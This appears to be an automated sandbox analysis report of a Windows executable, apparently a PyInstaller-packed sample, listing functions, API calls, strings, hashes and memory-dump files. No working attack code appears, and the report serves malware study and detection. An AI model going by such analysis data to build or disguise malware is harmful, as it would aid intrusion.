Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 6a1bdb23e936fd7f42fef10fe50e52eb6c64d494d97c892e80570c4d225324bd
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: F341DC61B19A02A1FB56CB16980467523A6BF4AB90FC84539ED3FC77C4FE7EE805C204

Function 00007FF6F0BD36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6F0BD3804), ref: 00007FF6F0BD36E1
GetLastError.KERNEL32(?,00007FF6F0BD3804), ref: 00007FF6F0BD36EB

Part of subcall function 00007FF6F0BD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
Part of subcall function 00007FF6F0BD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
Part of subcall function 00007FF6F0BD2C50: MessageBoxW.USER32 ref: 00007FF6F0BD2D99

Strings

\\?\, xrefs: 00007FF6F0BD375A
Failed to resolve full path to executable %ls., xrefs: 00007FF6F0BD3739
GetModuleFileNameW, xrefs: 00007FF6F0BD36FA
Failed to convert executable path to UTF-8., xrefs: 00007FF6F0BD3790
Failed to obtain executable path., xrefs: 00007FF6F0BD36F3

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 48a944b1a3723ab8dc99759e717684d722368117d21705db7aea60a2791280b3
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: F121A091B09A42A0FB209B20E9143B6A256BF4A785FC04132D67FC37D6FE2EE505C304

Function 00007FF6F0BEBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEBEF9

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
Instruction ID: 73fb2b25bce6f392b6c5ee5329a1ff902d42fe0b2e44128e6a0fe611d107e5b1
Opcode Fuzzy Hash: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
Instruction Fuzzy Hash: 7CC1E522A0C687E1E7608B159440ABE77A4EF82B80FD54171EA6F837D1EF7EE8558740

Function 00007FF6F0BD8760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6F0BD8780
OpenProcessToken.ADVAPI32 ref: 00007FF6F0BD8793
GetTokenInformation.KERNELBASE ref: 00007FF6F0BD87B8
GetLastError.KERNEL32 ref: 00007FF6F0BD87C2
GetTokenInformation.KERNELBASE ref: 00007FF6F0BD8802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6F0BD881E
CloseHandle.KERNEL32 ref: 00007FF6F0BD8836

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: 0d1b3dee8a3fa41962de25fb3e264486efd0224d3d2be7e44cc11a1d7d7c7d44
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: 1E218531A0C64292EB109B95F45463AE3A5FF86BA1F900235E67EC7BE4EF7ED4448740

Function 00007FF6F0BD90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6F0BD8760: GetCurrentProcess.KERNEL32 ref: 00007FF6F0BD8780
Part of subcall function 00007FF6F0BD8760: OpenProcessToken.ADVAPI32 ref: 00007FF6F0BD8793
Part of subcall function 00007FF6F0BD8760: GetTokenInformation.KERNELBASE ref: 00007FF6F0BD87B8
Part of subcall function 00007FF6F0BD8760: GetLastError.KERNEL32 ref: 00007FF6F0BD87C2
Part of subcall function 00007FF6F0BD8760: GetTokenInformation.KERNELBASE ref: 00007FF6F0BD8802
Part of subcall function 00007FF6F0BD8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6F0BD881E
Part of subcall function 00007FF6F0BD8760: CloseHandle.KERNEL32 ref: 00007FF6F0BD8836

LocalFree.KERNEL32(?,00007FF6F0BD3C55), ref: 00007FF6F0BD916C
LocalFree.KERNEL32(?,00007FF6F0BD3C55), ref: 00007FF6F0BD9175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6F0BD9183
D:(A;;FA;;;%s), xrefs: 00007FF6F0BD9157
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6F0BD9142
S-1-3-4, xrefs: 00007FF6F0BD9121

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: df58461f1ba567b84b3b04b22f6fdbac130d38a3452fa16294b81da0e13de93f
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 7A214F25A09783A1E7509B50E5152EAA366EF86780FC44031EA6ED37D6EF3ED9058780

Function 00007FF6F0BECFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BECFBB), ref: 00007FF6F0BED0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BECFBB), ref: 00007FF6F0BED177

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 414f2d05418fb9737e174909a2bf75e93a5527519b2aea8965243ee4d6b7e42a
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: A291D232F18652A5F7508F6594402BD2BA0BF46B88F944179DE2FA7BC5EE7ED442C700

Function 00007FF6F0BE5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE56C5
CreateFileW.KERNELBASE ref: 00007FF6F0BE5704
CloseHandle.KERNEL32 ref: 00007FF6F0BE5739

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: cccca9982455505907bd609a329f278d3302aa75bf3c049b2fc4fda44ec7def4
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 1441B322D1C78293E7508B6095203797360FB96764F509374EAAE43BD2EF7DA5E08740

Function 00007FF6F0BDCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BDCE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6F0BDCE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6F0BDCCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6F0BDCD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6F0BDCD91

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 8e4c4bb0909cf8ca5eaa2e81ded4e2c9b6fae10a0641351acb7612431c8c09b0
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 20313C25E0E14372FB64AB6498653B997939F47384FC44435E96FC73D3FE2EA40A8240

Function 00007FF6F0BE9AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6F0BE9A9C), ref: 00007FF6F0BE9AB1
TerminateProcess.KERNEL32(?,?,?,00007FF6F0BE9A9C), ref: 00007FF6F0BE9ABC
ExitProcess.KERNEL32 ref: 00007FF6F0BE9ACB

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: be74dd293d117c05c7857bd3abfddd474d6b2c5291924eae55ba529066298d8b
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: A7D06714B18647A2EB142BB0589947812556F4AB42B942478CC2B973D3FD3EE44D4300

Function 00007FF6F0BE01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE02E7

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: bddd2f935531eea7d3dd973352540b6ca21a799fa271a0e8de2467b77e01a76e
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 35516061B1924256F7288E659C0067E62D1BF46BA4F944730EE7FC77C5EF3ED4818600

Function 00007FF6F0BEC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6F0BEC33D), ref: 00007FF6F0BEC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF6F0BEC33D), ref: 00007FF6F0BEC1FA

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: a1ad9a8724109884aa36773a5892bb64cecb199cb843368319e60c6aae050607
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: F511E362718B8291DB108B25B804169A761FB46BF4FE44331EE7E8B7E9EF3DD0128700

Function 00007FF6F0BEA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: 4f96a63e2b56431027e083b47479c545e998f203d28cf6a2fccdb47535a56bdc
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: 93E08614F08203B2FF086BF2544553911556F8AB41F844074C83FC33E2FE3D68858300

Function 00007FF6F0BEABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6F0BEAA45,?,?,00000000,00007FF6F0BEAAFA), ref: 00007FF6F0BEAC36
GetLastError.KERNEL32(?,?,?,00007FF6F0BEAA45,?,?,00000000,00007FF6F0BEAAFA), ref: 00007FF6F0BEAC40

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 188da01fbd1217558132e3043fc76005b0ac9a0891bc233e322a14be12081a13
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 2021D511F1CA4262FF905761A89037D5696DF86BA0FA842B5DA3FC73C1EE6DF4458300

Function 00007FF6F0BEBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEBF44

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: f44f6f3032b1933a7c1f4286aec8d8bcb5a27749d9fbf57c0ef4dfd71e3e5353
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 7B41F232908201D7EB348B19A44067A77A4EB47B80F904171DAAFC77D2EF2EF402CB91

Function 00007FF6F0BD7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6F0BD802A

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 20a1915374d9a45148f36cae7429d8e519dbe3a1c715783fd4ae813ac2a96e38
Instruction ID: c4ca71f214e1fba252958b26d5fe2d9568249544969e4d9ec9bdc101b91cf29f
Opcode Fuzzy Hash: 20a1915374d9a45148f36cae7429d8e519dbe3a1c715783fd4ae813ac2a96e38
Instruction Fuzzy Hash: 1D21E721B1965266FB14AB1269047BAE652BF47BC4FCC4430EE2E877C6EE7EE045C640

Function 00007FF6F0BEB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEBA32

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction ID: 3d1b319e6ae49f0ec4debbcef323aebba5cfcf15e587e925038eadfd4046369b
Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction Fuzzy Hash: 3231E132E18642A5FB115B55984177D2660AF42F94FC202B5EA3F833D2EF7EE8418720

Function 00007FF6F0BE99D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6F0BE99FF

Part of subcall function 00007FF6F0BE9AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF6F0BE9B1D
Part of subcall function 00007FF6F0BE9AF8: GetProcAddress.KERNEL32 ref: 00007FF6F0BE9B33
Part of subcall function 00007FF6F0BE9AF8: FreeLibrary.KERNEL32 ref: 00007FF6F0BE9B5A

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: 188454f13ac60baba8cbd39f1db32e2de8efbcba8a8909638f95a8bb0f1d16ee
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
